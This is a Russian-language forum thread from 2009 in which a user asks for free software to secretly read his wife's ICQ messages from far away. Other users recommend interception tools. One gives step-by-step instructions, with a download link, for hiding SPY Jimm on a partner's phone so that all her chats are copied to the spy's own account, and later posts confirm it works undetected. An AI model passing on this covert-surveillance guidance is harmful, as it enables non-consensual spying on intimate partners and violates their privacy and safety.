Ищу нужен бесплатный перехватчик аськи

Тема в разделе "Софт", создана пользователем k0missar, 15 сен 2009.

Статус темы:
Закрыта.
  1. k0missar

k0missar

Регистр.:
    20 сен 2008
    Симпатии:
    25
    собственно из названия видно что мне нужно

2. MoQz

MoQz Постоялец

Регистр.:
    7 апр 2009
    Симпатии:
    95
    Существует разнообразный софт и сервисы: icqgate, icq snif; icqtrap.com. Важно знать, имеете ли вы доступ к его клиенту(пк либо телефону) или находитесь ли в одном сегменте сети, если нет, то весь этот софт теряет смысл.

3. geron83

geron83

Регистр.:
    1 май 2009
    Симпатии:
    73
    На сегодняшний день существует единственная рабочая программа для перехвата icq сообщений – ICQ Trap.
    Прослушка icq, перехват переписки icq, перехват пароля icq, взлом icq номеров, перехват icq трафика и др. Программа для перехвата icq сообщений сегодня повсеместно используется во всем мире и помогает решать самые разные проблемы.
    http://icqtrap.ru

4. s2s

s2s

Регистр.:
    27 июл 2007
    Симпатии:
    103
    ну и нахера ты здесь свою реф ссылку светишь, если постом выше был приведен данный сервис, к тому же ТС сказал бесплатный!, а указанный табой таким не является.

5. k0missar

k0missar

Регистр.:
    20 сен 2008
    Симпатии:
    25
    бесплатно это когда ты нечего не платишь, потому icqtrap неподходит... и я не нахожусь в одном сегменте сети, мне нужно допустим просто узнать о чем переписывается например моя жена в аське, а разделяет нас сейчас 2000 км..... есть ли вообще софт для прослушки аськи или я ище то чего в прероде не существует

6. geron83

geron83

Регистр.:
    1 май 2009
    Симпатии:
    73
    Если бы кто то контролирует тебя, то высвителось бы...что ваш номер аси используется на другом компе. Вот !!!
    в настройках сети просто есть пункт “разрешить удаленный доступ“ если галочка стоит, можно подключиться, если не стоит - нельзя. Если аська открыта, кто-то через удаленный доступ просто может щелкнуть мышкой по окну аськиному вашему, допустим вы куда то отошли, вроде...

7. k0missar

k0missar

Регистр.:
    20 сен 2008
    Симпатии:
    25
    на самом деле ничего не понял... и вот а если у нее аська на мобильном стоит

8. MoQz

MoQz Постоялец

Регистр.:
    7 апр 2009
    Симпатии:
    95
    SPY Jimm
    Скачай SPY Jimm бесплатно на телефон подруги.
    Теперь запусти программу. В пункте Настройки >> Сеть >> Доп. порт введи свой номер ICQ . Именно на этот номер будет дублироваться вся переписка.
    http://spy-jimm.ru/download/Раньше юзали IMMonitor ICQ Spy Он позволяет вам наблюдать, блокировать или записывать разговоры по ICQ чату в удаленном режиме.
    Тоесть запускаешь ее на своем компе, она должна ввести указанный тобой юин и все - пока работает комп тебе летят ее сообщения.
    http://nnm.ru/blogs/death007/immonitor_icq_spy_228/

Janine нравится это.
  9. eremenko

eremenko Писатель

Регистр.:
    16 сен 2009
    Симпатии:
    0
    такого рода программы стоят денег,а то что бесплатное там вирусы
    качать не советую:D

10. doxx

doxx |||llll|||||llll|||

Регистр.:
    18 фев 2009
    Симпатии:
    212
    хуирсы, spy jimm java код, и никаких там вирусов нету, элементарный скрытый дублер сообщений, сам юзал - прекрасно работает. правда может пропалиться по трафику.

valwer нравится это.
Статус темы:
Закрыта.